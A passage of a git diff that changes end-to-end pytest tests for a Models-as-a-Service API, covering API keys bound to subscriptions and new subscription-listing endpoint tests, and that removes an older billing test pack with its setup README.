test_e2e_single_subscription_auto_selects(self): _delete_sa(sa_name, namespace=ns) _wait_reconcile() - def test_e2e_multiple_subscriptions_without_header_gets_403(self): - """ - E2E test: User with multiple subscriptions must provide header. - - Validates PR #427/#441 behavior: When a user has access to multiple subscriptions - but doesn't provide x-maas-subscription header, they receive 403 Forbidden with - error code "multiple_subscriptions". - """ - ns = _ns() - # Using existing model (MODEL_REF) # model_ref = "e2e-test-model-multi-sub" - # Using MODEL_PATH # model_path = f"/llm/{model_ref}" - auth_policy_name = "e2e-test-auth-multi-sub" - subscription_1 = "e2e-test-subscription-tier1" - subscription_2 = "e2e-test-subscription-tier2" - sa_name = "e2e-sa-multi-sub" - - try: - # Create service account and get OC token for maas-api - oc_token = _create_sa_token(sa_name, namespace=ns) - sa_user = _sa_to_user(sa_name, namespace=ns) - - # Create test resources with 2 subscriptions for the same user - _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[sa_user]) - _create_test_subscription(subscription_1, MODEL_REF, users=[sa_user], token_limit=100) - _create_test_subscription(subscription_2, MODEL_REF, users=[sa_user], token_limit=500) - - _wait_reconcile() - - # Create API key for inference - api_key = _create_api_key(oc_token, name=f"{sa_name}-key") - - # Test: Multiple subscriptions + no header → 403 - log.info("Testing: User with multiple subscriptions, no header") - r = _poll_status(api_key, 403, path=MODEL_PATH, subscription=False, timeout=90) - log.info("✅ Multiple subscriptions without header → %s", r.status_code) - - # Optionally verify error code in response or headers - # PR #441 returns error code in x-ext-auth-reason header or response body - - finally: - _delete_cr("maassubscription", subscription_1, namespace=ns) - _delete_cr("maassubscription", subscription_2, namespace=ns) - _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns) - 
_delete_sa(sa_name, namespace=ns) - _wait_reconcile() - - def test_e2e_multiple_subscriptions_with_valid_header_gets_200(self): + def test_e2e_multiple_subscriptions_separate_keys_gets_200(self): """ - E2E test: User with multiple subscriptions can select one via header. - - Validates PR #427/#441 behavior: When a user has access to multiple subscriptions - and provides a valid x-maas-subscription header, they can successfully make requests. + User with two subscriptions for the same model: mint one API key per subscription; + each key succeeds on inference without x-maas-subscription. """ ns = _ns() - # Using existing model (MODEL_REF) # model_ref = "e2e-test-model-multi-sub-valid" - # Using MODEL_PATH # model_path = f"/llm/{model_ref}" auth_policy_name = "e2e-test-auth-multi-sub-valid" subscription_1 = "e2e-test-subscription-free" subscription_2 = "e2e-test-subscription-premium" @@ -1717,19 +1816,24 @@ def test_e2e_multiple_subscriptions_with_valid_header_gets_200(self): _wait_reconcile() - # Create API key for inference - api_key = _create_api_key(oc_token, name=f"{sa_name}-key") + key1 = _create_api_key( + oc_token, + name=f"{sa_name}-key-tier1", + subscription=subscription_1, + ) + key2 = _create_api_key( + oc_token, + name=f"{sa_name}-key-tier2", + subscription=subscription_2, + ) - # Test 1: Select subscription_1 via header → 200 - log.info("Testing: User with multiple subscriptions, selecting subscription 1") - r1 = _poll_status(api_key, 200, path=MODEL_PATH, subscription=subscription_1, timeout=90) - log.info("✅ Multiple subscriptions with valid header (tier 1) → %s", r1.status_code) + log.info("Testing: key bound to subscription 1") + r1 = _poll_status(key1, 200, path=MODEL_PATH, timeout=90) + log.info("✅ Key for tier 1 → %s", r1.status_code) - # Test 2: Select subscription_2 via header → 200 - log.info("Testing: User with multiple subscriptions, selecting subscription 2") - r2 = _inference(api_key, path=MODEL_PATH, subscription=subscription_2) - assert 
r2.status_code == 200, f"Expected 200 for valid subscription_2, got {r2.status_code}" - log.info("✅ Multiple subscriptions with valid header (tier 2) → %s", r2.status_code) + log.info("Testing: key bound to subscription 2") + r2 = _poll_status(key2, 200, path=MODEL_PATH, timeout=90) + log.info("✅ Key for tier 2 → %s", r2.status_code) finally: _delete_cr("maassubscription", subscription_1, namespace=ns) @@ -1738,57 +1842,9 @@ def test_e2e_multiple_subscriptions_with_valid_header_gets_200(self): _delete_sa(sa_name, namespace=ns) _wait_reconcile() - def test_e2e_multiple_subscriptions_with_invalid_header_gets_403(self): - """ - E2E test: User with multiple subscriptions + invalid header gets 403. - - Validates PR #441 behavior: When a user provides an invalid or non-existent - x-maas-subscription header, they receive 403 Forbidden with error code "not_found". - """ - ns = _ns() - # Using existing model (MODEL_REF) # model_ref = "e2e-test-model-multi-sub-invalid" - # Using MODEL_PATH # model_path = f"/llm/{model_ref}" - auth_policy_name = "e2e-test-auth-multi-sub-invalid" - subscription_1 = "e2e-test-subscription-valid" - sa_name = "e2e-sa-multi-sub-invalid" - - try: - # Create service account and get OC token for maas-api - oc_token = _create_sa_token(sa_name, namespace=ns) - sa_user = _sa_to_user(sa_name, namespace=ns) - - # Create test resources - _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[sa_user]) - _create_test_subscription(subscription_1, MODEL_REF, users=[sa_user]) - - _wait_reconcile() - - # Create API key for inference - api_key = _create_api_key(oc_token, name=f"{sa_name}-key") - - # Test: Invalid/non-existent subscription header → 403 - log.info("Testing: User with invalid subscription header") - r = _inference(api_key, path=MODEL_PATH, subscription="nonexistent-subscription-xyz") - assert r.status_code == 403, f"Expected 403 for invalid subscription, got {r.status_code}" - log.info("✅ Invalid subscription header → %s", r.status_code) - - 
finally: - _delete_cr("maassubscription", subscription_1, namespace=ns) - _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns) - _delete_sa(sa_name, namespace=ns) - _wait_reconcile() - - def test_e2e_multiple_subscriptions_with_inaccessible_header_gets_403(self): - """ - E2E test: User requesting subscription they don't own gets 403. - - Validates PR #441 behavior: When a user provides an x-maas-subscription header - for a subscription they don't have access to, they receive 403 Forbidden with - error code "access_denied". - """ + def test_e2e_mint_api_key_denied_for_inaccessible_subscription(self): + """POST /v1/api-keys with another user's subscription returns generic invalid_subscription.""" ns = _ns() - # Using existing model (MODEL_REF) # model_ref = "e2e-test-model-access-denied" - # Using MODEL_PATH # model_path = f"/llm/{model_ref}" auth_policy_name = "e2e-test-auth-access-denied" user_subscription = "e2e-test-user-subscription" other_subscription = "e2e-test-other-subscription" @@ -1812,14 +1868,19 @@ def test_e2e_multiple_subscriptions_with_inaccessible_header_gets_403(self): _wait_reconcile() - # Create API key for user - api_key_user = _create_api_key(oc_token_user, name=f"{sa_user}-key") - - # Test: User tries to access another user's subscription → 403 - log.info("Testing: User requesting subscription they don't own") - r = _inference(api_key_user, path=MODEL_PATH, subscription=other_subscription) - assert r.status_code == 403, f"Expected 403 for inaccessible subscription, got {r.status_code}" - log.info("✅ Inaccessible subscription header → %s", r.status_code) + r = requests.post( + f"{_maas_api_url()}/v1/api-keys", + headers={ + "Authorization": f"Bearer {oc_token_user}", + "Content-Type": "application/json", + }, + json={"name": f"{sa_user}-bad-sub-key", "subscription": other_subscription}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert r.status_code == 400, f"Expected 400, got {r.status_code}: {r.text[:500]}" + assert 
r.json().get("code") == "invalid_subscription", r.text + log.info("✅ Mint with inaccessible subscription → %s", r.status_code) finally: _delete_cr("maassubscription", user_subscription, namespace=ns) @@ -1856,12 +1917,15 @@ def test_e2e_group_based_access_gets_200(self): _wait_reconcile() - # Create API key for inference - api_key = _create_api_key(oc_token, name=f"{sa_name}-key") + api_key = _create_api_key( + oc_token, + name=f"{sa_name}-key", + subscription=subscription_name, + ) # Test: User matches via group membership → 200 log.info("Testing: Group-based auth and subscription") - r = _poll_status(api_key, 200, path=MODEL_PATH, subscription=subscription_name, timeout=90) + r = _poll_status(api_key, 200, path=MODEL_PATH, timeout=90) log.info("✅ Group-based access → %s", r.status_code) finally: @@ -1894,18 +1958,18 @@ def test_e2e_group_based_auth_but_no_subscription_gets_403(self): # Create auth policy using group _create_test_auth_policy(auth_policy_name, MODEL_REF, groups=[test_group]) - # Delete simulator-subscription so user has no matching subscriptions - _delete_cr("maassubscription", SIMULATOR_SUBSCRIPTION) + api_key = _create_api_key( + oc_token, + name=f"{sa_name}-key", + subscription=SIMULATOR_SUBSCRIPTION, + ) + _delete_cr("maassubscription", SIMULATOR_SUBSCRIPTION) _wait_reconcile() - # Create API key for inference - api_key = _create_api_key(oc_token, name=f"{sa_name}-key") - - # Test: Group auth passes but no subscription for that group → 403 - log.info("Testing: Group-based auth but no subscription") - r = _poll_status(api_key, 403, path=MODEL_PATH, subscription=False, timeout=90) - log.info("✅ Group auth but no subscription → %s", r.status_code) + log.info("Testing: Group-based auth; key bound to removed subscription") + r = _poll_status(api_key, 403, path=MODEL_PATH, timeout=90) + log.info("✅ Group auth but no live subscription for bound key → %s", r.status_code) finally: # Restore simulator-subscription first @@ -1951,12 +2015,15 @@ def 
test_e2e_group_based_subscription_but_no_auth_gets_403(self): _wait_reconcile() - # Create API key for inference - api_key = _create_api_key(oc_token, name=f"{sa_name}-key") + api_key = _create_api_key( + oc_token, + name=f"{sa_name}-key", + subscription=subscription_name, + ) # Test: Has subscription via group but no auth → 403 log.info("Testing: Group-based subscription but no auth") - r = _poll_status(api_key, 403, path=MODEL_PATH, subscription=subscription_name, timeout=90) + r = _poll_status(api_key, 403, path=MODEL_PATH, timeout=90) log.info("✅ Group subscription but no auth → %s", r.status_code) finally: @@ -1967,4 +2034,3 @@ def test_e2e_group_based_subscription_but_no_auth_gets_403(self): _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns) _delete_sa(sa_name, namespace=ns) _wait_reconcile() - diff --git a/test/e2e/tests/test_subscription_list_endpoints.py b/test/e2e/tests/test_subscription_list_endpoints.py new file mode 100644 index 000000000..c5fc8550e --- /dev/null +++ b/test/e2e/tests/test_subscription_list_endpoints.py @@ -0,0 +1,273 @@ +""" +E2E tests for the subscription listing endpoints: + - GET /v1/subscriptions + - GET /v1/model/:model-id/subscriptions + +These endpoints return SubscriptionInfo objects with fields: + subscription_id_header, subscription_description, display_name, priority, + model_refs, organization_id, cost_center, labels + +Requires same environment setup as test_subscription.py. 
+""" + +import json +import logging +import os + +import pytest +import requests + +from test_subscription import ( + _create_api_key, + _create_sa_token, + _create_test_auth_policy, + _create_test_subscription, + _delete_cr, + _delete_sa, + _maas_api_url, + _ns, + _sa_to_user, + _wait_reconcile, + MODEL_NAMESPACE, + MODEL_REF, + DISTINCT_MODEL_REF, + DISTINCT_MODEL_2_REF, + SIMULATOR_SUBSCRIPTION, + TIMEOUT, + TLS_VERIFY, +) + +log = logging.getLogger(__name__) + + +def _validate_subscription_info_schema(sub): + """Validate a SubscriptionInfo object has the expected structure.""" + assert "subscription_id_header" in sub, f"Missing subscription_id_header: {sub}" + assert isinstance(sub["subscription_id_header"], str), "subscription_id_header must be string" + + assert "subscription_description" in sub, f"Missing subscription_description: {sub}" + assert isinstance(sub["subscription_description"], str), "subscription_description must be string" + + assert "priority" in sub, f"Missing priority: {sub}" + assert isinstance(sub["priority"], int), "priority must be integer" + + assert "model_refs" in sub, f"Missing model_refs: {sub}" + assert isinstance(sub["model_refs"], list), "model_refs must be a list" + + # Validate model_refs structure + for ref in sub["model_refs"]: + assert "name" in ref, f"model_ref missing name: {ref}" + assert isinstance(ref["name"], str), "model_ref name must be string" + + # Optional fields + if "display_name" in sub: + assert isinstance(sub["display_name"], str), "display_name must be string" + if "organization_id" in sub: + assert isinstance(sub["organization_id"], str), "organization_id must be string" + if "cost_center" in sub: + assert isinstance(sub["cost_center"], str), "cost_center must be string" + if "labels" in sub: + assert isinstance(sub["labels"], dict), "labels must be a dict" + + +class TestListSubscriptions: + """E2E tests for GET /v1/subscriptions.""" + + def test_returns_accessible_subscriptions(self): + """Authenticated 
user gets their accessible subscriptions.""" + sa_name = "e2e-list-subs-sa" + sa_ns = "default" + + try: + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + api_key = _create_api_key(sa_token, name=f"{sa_name}-key") + + _wait_reconcile() + + url = f"{_maas_api_url()}/v1/subscriptions" + r = requests.get( + url, + headers={"Authorization": f"Bearer {api_key}"}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}" + + data = r.json() + assert isinstance(data, list), f"Expected array response, got {type(data).__name__}" + + # User should have at least one subscription (simulator-subscription via system:authenticated) + assert len(data) >= 1, f"Expected at least 1 subscription, got {len(data)}" + + # Validate schema of each subscription + for sub in data: + _validate_subscription_info_schema(sub) + + # Verify simulator-subscription is present + sub_ids = [s["subscription_id_header"] for s in data] + assert SIMULATOR_SUBSCRIPTION in sub_ids, \ + f"Expected '{SIMULATOR_SUBSCRIPTION}' in accessible subscriptions, got {sub_ids}" + + log.info(f"GET /v1/subscriptions -> {r.status_code} with {len(data)} subscription(s): {sub_ids}") + + finally: + _delete_sa(sa_name, namespace=sa_ns) + + def test_unauthenticated_returns_401(self): + """Request without auth returns 401.""" + url = f"{_maas_api_url()}/v1/subscriptions" + r = requests.get(url, timeout=TIMEOUT, verify=TLS_VERIFY) + assert r.status_code == 401, f"Expected 401, got {r.status_code}: {r.text}" + log.info(f"GET /v1/subscriptions (no auth) -> {r.status_code}") + + def test_subscription_includes_model_refs(self): + """Subscriptions include model_refs with name and rate limit info.""" + sa_name = "e2e-list-subs-refs-sa" + sa_ns = "default" + maas_ns = _ns() + subscription_name = "e2e-list-subs-refs-sub" + + try: + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + sa_user = _sa_to_user(sa_name, namespace=sa_ns) + + _create_test_subscription( 
+ subscription_name, MODEL_REF, + users=[sa_user], + token_limit=500, window="1h", + ) + + api_key = _create_api_key(sa_token, name=f"{sa_name}-key") + _wait_reconcile() + + url = f"{_maas_api_url()}/v1/subscriptions" + r = requests.get( + url, + headers={"Authorization": f"Bearer {api_key}"}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 200 + data = r.json() + + # Find our test subscription + test_sub = next( + (s for s in data if s["subscription_id_header"] == subscription_name), + None, + ) + assert test_sub is not None, \ + f"Test subscription '{subscription_name}' not found in {[s['subscription_id_header'] for s in data]}" + + # Validate model_refs + assert len(test_sub["model_refs"]) >= 1, "Expected at least 1 model_ref" + ref = test_sub["model_refs"][0] + assert ref["name"] == MODEL_REF, f"Expected model_ref name '{MODEL_REF}', got '{ref['name']}'" + + # Validate token_rate_limits if present + if "token_rate_limits" in ref and ref["token_rate_limits"]: + trl = ref["token_rate_limits"][0] + assert "limit" in trl, "token_rate_limit missing 'limit'" + assert "window" in trl, "token_rate_limit missing 'window'" + + log.info(f"Subscription '{subscription_name}' has model_refs: {test_sub['model_refs']}") + + finally: + _delete_cr("maassubscription", subscription_name, namespace=maas_ns) + _delete_sa(sa_name, namespace=sa_ns) + + +class TestListSubscriptionsForModel: + """E2E tests for GET /v1/model/:model-id/subscriptions.""" + + def test_returns_subscriptions_for_model(self): + """Returns only subscriptions that include the requested model.""" + sa_name = "e2e-subs-model-sa" + sa_ns = "default" + maas_ns = _ns() + sub_with_model = "e2e-subs-model-match" + sub_without_model = "e2e-subs-model-nomatch" + + try: + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + sa_user = _sa_to_user(sa_name, namespace=sa_ns) + + # Create two subscriptions: one with DISTINCT_MODEL_REF, one with DISTINCT_MODEL_2_REF + 
_create_test_subscription(sub_with_model, DISTINCT_MODEL_REF, users=[sa_user]) + _create_test_subscription(sub_without_model, DISTINCT_MODEL_2_REF, users=[sa_user]) + + api_key = _create_api_key(sa_token, name=f"{sa_name}-key") + _wait_reconcile() + + # Query for subscriptions that include DISTINCT_MODEL_REF + url = f"{_maas_api_url()}/v1/model/{DISTINCT_MODEL_REF}/subscriptions" + r = requests.get( + url, + headers={"Authorization": f"Bearer {api_key}"}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}" + + data = r.json() + assert isinstance(data, list), f"Expected array response, got {type(data).__name__}" + + sub_ids = [s["subscription_id_header"] for s in data] + + # The matching subscription should be present + assert sub_with_model in sub_ids, \ + f"Expected '{sub_with_model}' in results, got {sub_ids}" + + # The non-matching subscription should NOT be present + assert sub_without_model not in sub_ids, \ + f"'{sub_without_model}' should not be in results for model {DISTINCT_MODEL_REF}, got {sub_ids}" + + # Validate schema + for sub in data: + _validate_subscription_info_schema(sub) + + log.info(f"GET /v1/model/{DISTINCT_MODEL_REF}/subscriptions -> {len(data)} subscription(s): {sub_ids}") + + finally: + _delete_cr("maassubscription", sub_with_model, namespace=maas_ns) + _delete_cr("maassubscription", sub_without_model, namespace=maas_ns) + _delete_sa(sa_name, namespace=sa_ns) + + def test_unknown_model_returns_empty(self): + """Querying subscriptions for a model not in any subscription returns empty list.""" + sa_name = "e2e-subs-unknown-model-sa" + sa_ns = "default" + + try: + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + api_key = _create_api_key(sa_token, name=f"{sa_name}-key") + + _wait_reconcile() + + url = f"{_maas_api_url()}/v1/model/nonexistent-model-xyz/subscriptions" + r = requests.get( + url, + headers={"Authorization": f"Bearer {api_key}"}, + timeout=TIMEOUT, + 
verify=TLS_VERIFY, + ) + + assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}" + + data = r.json() + assert isinstance(data, list), f"Expected array response, got {type(data).__name__}" + assert len(data) == 0, f"Expected empty list for unknown model, got {len(data)}: {data}" + + log.info(f"GET /v1/model/nonexistent-model-xyz/subscriptions -> {r.status_code} with [] (empty)") + + finally: + _delete_sa(sa_name, namespace=sa_ns) + + def test_unauthenticated_returns_401(self): + """Request without auth returns 401.""" + url = f"{_maas_api_url()}/v1/model/{MODEL_REF}/subscriptions" + r = requests.get(url, timeout=TIMEOUT, verify=TLS_VERIFY) + assert r.status_code == 401, f"Expected 401, got {r.status_code}: {r.text}" + log.info(f"GET /v1/model/{MODEL_REF}/subscriptions (no auth) -> {r.status_code}") diff --git a/test/maas_billing_tests_independent/.gitignore b/test/maas_billing_tests_independent/.gitignore deleted file mode 100644 index 109ad0bf1..000000000 --- a/test/maas_billing_tests_independent/.gitignore +++ /dev/null @@ -1,27 +0,0 @@ -# --- Python virtual env (local) --- -.venv/ -venv/ - -# --- Python caches & compiled files --- -__pycache__/ -*.pyc - -# --- Test caches & coverage --- -.pytest_cache/ -.mypy_cache/ -.ruff_cache/ -.tox/ -.coverage -coverage.xml -htmlcov/ - -# --- Keep these folders but ignore their contents --- -artifacts/* -!artifacts/.gitkeep - -reports/* -!reports/.gitkeep - -# --- Certs kept out of Git (scoped to this folder) --- -ingress-ca.crt -tests/ingress-ca.crt diff --git a/test/maas_billing_tests_independent/pytest.ini b/test/maas_billing_tests_independent/pytest.ini deleted file mode 100644 index 3591f3c56..000000000 --- a/test/maas_billing_tests_independent/pytest.ini +++ /dev/null @@ -1,2 +0,0 @@ -[pytest] -addopts = -ra diff --git a/test/maas_billing_tests_independent/requirements.txt b/test/maas_billing_tests_independent/requirements.txt deleted file mode 100644 index 547de5c5b..000000000 --- 
a/test/maas_billing_tests_independent/requirements.txt +++ /dev/null @@ -1,2 +0,0 @@ -pytest -requests diff --git a/test/maas_billing_tests_independent/tests/README.MD b/test/maas_billing_tests_independent/tests/README.MD deleted file mode 100644 index 889a10299..000000000 --- a/test/maas_billing_tests_independent/tests/README.MD +++ /dev/null @@ -1,397 +0,0 @@ -# Models-as-a-Service Tests — How to Run (Admin / Free / Premium) - -This guide shows how to run the **maas_billing_tests_independent** test pack -against **your OpenShift cluster** and **whatever model is installed**. -It covers Admin, Free, and Premium and shows how to generate HTML/JUnit reports. - -**No code changes are required.** - ---- - -## 0) Prerequisites - -- Python **3.10+** -- `oc` CLI (logged into your cluster) -- `jq` (recommended) – `sudo apt-get install -y jq` on Debian/Ubuntu/WSL -- Shell: commands use **bash/WSL**; PowerShell equivalents are at the end. - -Create a venv and install deps: - -```bash -cd maas_billing_tests_independent -python3 -m venv .venv -source .venv/bin/activate -pip install -r requirements.txt - -# (optional) pretty HTML report -pip install pytest-html -``` ---- - -## 1) Login & environment (run in every new shell) - -Login as the user you want to test (Admin first, later Free and Premium): - -```bash -oc login https://api.:6443 --token '' -oc whoami -``` - -Resolve Route host and set base URLs: - -```bash -CLUSTER_DOMAIN=$(oc get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}') -HOST="maas.${CLUSTER_DOMAIN}" # note: no "-api" here -export MAAS_API_BASE_URL="http://${HOST}/maas-api" # point directly to /maas-api -export USAGE_API_BASE="$MAAS_API_BASE_URL" - -export FREE_OC_TOKEN="$(oc whoami -t)" -``` - -Pick a **MODEL_NAME** from the catalog (`id` field): - -```bash -curl -s -H "Authorization: Bearer ${FREE_OC_TOKEN}" "${MAAS_API_BASE_URL}/v1/models" | jq -r '.data[] | [.id,.name,.url] | @tsv' -export MODEL_NAME="" # e.g., facebook/opt-125m -export 
MODEL_URL="" # direct model URL, e.g. maas.apps.ci-ln-t6jfcg2-76ef8.aws-2.ci.openshift.org/llm/facebook-opt-125m-simulated/v1/chat/completions -``` ---- - -## 2) Configure limits the tests will use - -### 2.1 Request-rate bursts (Free & Premium) - -Read your gateway **RateLimitPolicy** values and export them so the tests know -what to expect: - -```bash -# FREE request-rate burst (per window) -export RATE_LIMIT_BURST_FREE=$( - oc -n openshift-ingress get ratelimitpolicies.kuadrant.io gateway-rate-limits \ - -o jsonpath='{.spec.limits.free.rates[0].limit}' -) - -# Premium (optional; only needed for the Free-vs-Premium test) -export RATE_LIMIT_BURST_PREMIUM=$( - oc -n openshift-ingress get ratelimitpolicies.kuadrant.io gateway-rate-limits \ - -o jsonpath='{.spec.limits.enterprise.rates[0].limit}' -) -``` - -### 2.2 Keep request-rate tests away from token-rate limits - -Use small per-call generation and a short delay (these defaults work well): - -```bash -export TOKENS_PER_CALL_SMALL=16 -export BURST_SLEEP=0.05 -``` - -> You can override any of these per run without editing the code. - ---- - -## 3) Run tests — by role - -Re-run the login + `export` lines when you switch users. -The suite assumes **`FREE_OC_TOKEN`** holds the *current* user’s token. 
- -### A) Admin (sanity / wiring) - -```bash -pytest -q test/maas_billing_tests_independent/tests/test_tokens.py::test_minted_token_is_jwt -pytest -q test/maas_billing_tests_independent/tests/test_models_user.py -pytest -q test/maas_billing_tests_independent/tests/test_gateway_endpoints.py::test_chat_completion_works -``` - -### B) Free user (authz + request-rate burst + usage) - -```bash -# log in as a *Free* user, then: -export FREE_OC_TOKEN="$(oc whoami -t)" - -# basics -pytest -q test/maas_billing_tests_independent/tests/test_tokens.py::test_minted_token_is_jwt -pytest -q test/maas_billing_tests_independent/tests/test_models_user.py -pytest -q test/maas_billing_tests_independent/tests/test_gateway_endpoints.py::test_chat_completion_works - -# request-rate burst (expects some 429s after RATE_LIMIT_BURST_FREE) -pytest -q test/maas_billing_tests_independent/tests/test_quota_global.py::test_rate_limit_burst - -# usage (optional; requires USAGE_API_BASE) -pytest -q test/maas_billing_tests_independent/tests/test_usage_logs.py -``` - -#### Token‑rate for Free -Trigger token-based limiting by making each call expensive in tokens: -```bash -export TOKENS_PER_CALL_LARGE=1200 -pytest -q test/maas_billing_tests_independent/tests/test_token_ratelimit.py -``` - -#### Interplay for Free — which limiter fires first? 
-**Request‑rate first:** many *cheap* calls -```bash -export TOKENS_PER_CALL_SMALL=16 -export BURST_SLEEP=0.05 -pytest -q test/maas_billing_tests_independent/tests/test_quota_global.py::test_rate_limit_burst -``` -**Token‑rate first:** few *expensive* calls -```bash -export TOKENS_PER_CALL_LARGE=1200 -pytest -q test/maas_billing_tests_independent/tests/test_token_ratelimit.py -``` - -### C) Premium user (same flow + Free-vs-Premium comparison) - -```bash -# log in as a *Premium* user, then: -export FREE_OC_TOKEN="$(oc whoami -t)" # current user’s token again -export PREMIUM_OC_TOKEN="$FREE_OC_TOKEN" # used by the test to mint for premium - -pytest -q test/maas_billing_tests_independent/tests/test_gateway_endpoints.py::test_chat_completion_works - -# Compare Free vs Premium burst; Premium must not be worse than Free -# (uses RATE_LIMIT_BURST_FREE / RATE_LIMIT_BURST_PREMIUM) -pytest -q test/maas_billing_tests_independent/tests/test_quota_per_user.py::test_free_vs_premium_quota -``` - -#### Token‑rate for Premium -Run the token limiter test while logged in as your Premium user: -```bash -export TOKENS_PER_CALL_LARGE=1200 -pytest -q test/maas_billing_tests_independent/tests/test_token_ratelimit.py -``` - -#### Interplay for Premium — which limiter fires first? 
-**Request‑rate first:** many *cheap* calls (uses `RATE_LIMIT_BURST_PREMIUM` if you exported it) -```bash -export TOKENS_PER_CALL_SMALL=16 -export BURST_SLEEP=0.05 -pytest -q test/maas_billing_tests_independent/tests/test_quota_global.py::test_rate_limit_burst -``` -**Token‑rate first:** few *expensive* calls -```bash -export TOKENS_PER_CALL_LARGE=1200 -pytest -q test/maas_billing_tests_independent/tests/test_token_ratelimit.py -``` - -### D) Token-rate (current user – Free **or** Premium) - -If you want to *exercise* token-rate limiting, increase tokens per call to make it trip: - -```bash -export TOKENS_PER_CALL_LARGE=1200 # example value to drive token usage -pytest -q test/maas_billing_tests_independent/tests/test_token_ratelimit.py -``` - ---- - -## 3E) Interplay: which limiter applies first? (request‑rate vs token‑rate) - -The gateway evaluates **both** limiters on every call; you get **429** as soon as **either** limit is exceeded. -By shaping traffic as above (many *cheap* calls vs few *expensive* calls), you can show each limiter firing first, proving both are active on your cluster. 
- ---- - -## 4) Reports (HTML & JUnit) - -```bash -# Create a timestamped artifacts folder -REP_ROOT=test/maas_billing_tests_independent/artifacts -TS=$(date +%Y-%m-%d_%H-%M-%S) -OUT="$REP_ROOT/$TS" -mkdir -p "$OUT" - -# Example: run everything for the current user and produce reports -pytest -q test/maas_billing_tests_independent/tests \ - --html="$OUT/maas-test-report.html" --self-contained-html \ - --junitxml="$OUT/maas-test-report.xml" - -echo "Reports saved in: $OUT" -# Note - The artifacts/ folder is kept in Git but its contents are ignored, so reports don't show in PRs -``` - -### 4.1 Smoke tests & single test (saved under artifacts/) - -```bash -# 3 smoke tests → one report -REP_ROOT=test/maas_billing_tests_independent/artifacts -TS=$(date +%Y-%m-%d_%H-%M-%S) -OUT="$REP_ROOT/$TS" -mkdir -p "$OUT" - -pytest -q \ - test/maas_billing_tests_independent/tests/test_tokens.py::test_minted_token_is_jwt \ - test/maas_billing_tests_independent/tests/test_models_user.py \ - test/maas_billing_tests_independent/tests/test_gateway_endpoints.py::test_chat_completion_works \ - --html="$OUT/smoke.html" --self-contained-html \ - --junitxml="$OUT/smoke.xml" - -# Single test → its own report -pytest -q test/maas_billing_tests_independent/tests/test_gateway_endpoints.py::test_chat_completion_works \ - --html="$OUT/chat.html" --self-contained-html \ - --junitxml="$OUT/chat.xml" -``` - ---- - -## 5) What each test does (cheat-sheet) - -- `tests/test_tokens.py` – mints a short-lived MaaS JWT from your OC token. -- `tests/test_models_user.py` – lists models; asserts your `MODEL_NAME` exists. -- `tests/test_gateway_endpoints.py` – discovers the model’s **URL** via `/v1/models` - then calls **`/v1/chat/completions`** and expects a normal reply. -- `tests/test_quota_global.py` – sends **N = RATE_LIMIT_BURST_FREE + 5** quick calls with - low tokens; expects ≥ `RATE_LIMIT_BURST_FREE` successes and then **429** (request-rate limiter). 
-- `tests/test_quota_per_user.py` – runs the same quick burst for Free & Premium; asserts - **Premium ≥ Free** (Premium is not more restricted). -- `tests/test_token_ratelimit.py` (optional) – cranks up token usage to hit the token-rate - limiter and prints usage headers: - `x-odhu-usage-input-tokens`, `x-odhu-usage-output-tokens`, `x-odhu-usage-total-tokens`. -- `tests/test_usage_logs.py` (optional) – smoke call + probe of the Usage API endpoint. - ---- - -### 5A) Tool Calling - -Validates vLLM tool calling end-to-end through MaaS. -Works with Qwen/Qwen3-0.6B (or any model deployed with tool calling enabled). - -### Prereqs - -The model deployment must enable tool calling, e.g. vLLM args include: -- `--tool-call-parser qwen3_xml` -- `--enable-auto-tool-choice` - -The MaaS token endpoint may reject short TTLs. Use ≥ 10m. - -### Run tests - -```bash -# Pick a model that supports tool calling: -export MODEL_NAME="Qwen/Qwen3-0.6B" -# Gate to enable these tests -export TOOL_CALLING_ENABLED=true - -pytest -q test/maas_billing_tests_independent/tests/test_tool_calling.py::test_tool_calling_forced -s \ - --html="$OUT/tool-calling-forced.html" --self-contained-html \ - --junitxml="$OUT/tool-calling-forced.xml" -``` - -### 5B) Streaming (SSE) chat completions - -Validates that the model endpoint supports Server-Sent Events with `stream:true`: -- Confirms Content-Type: `text/event-stream` -- Parses data: frames as JSON (`choices[].delta.content`) -- Reconstructs non-empty text from chunks -- Ensures the stream ends with `[DONE]` - -```bash -# Enable the streaming test (and extra logs) -STREAMING_ENABLED=true STREAMING_DEBUG=true \ -pytest -q test/maas_billing_tests_independent/tests/test_streaming_chat.py::test_chat_completions_streaming \ - -s --capture=tee-sys \ - --html="$OUT/streaming.html" --self-contained-html \ - --junitxml="$OUT/streaming.xml" - -echo "Streaming reports saved in: $OUT" -``` - -## 6) PowerShell equivalents (Windows) - -```powershell -# venv -python -m 
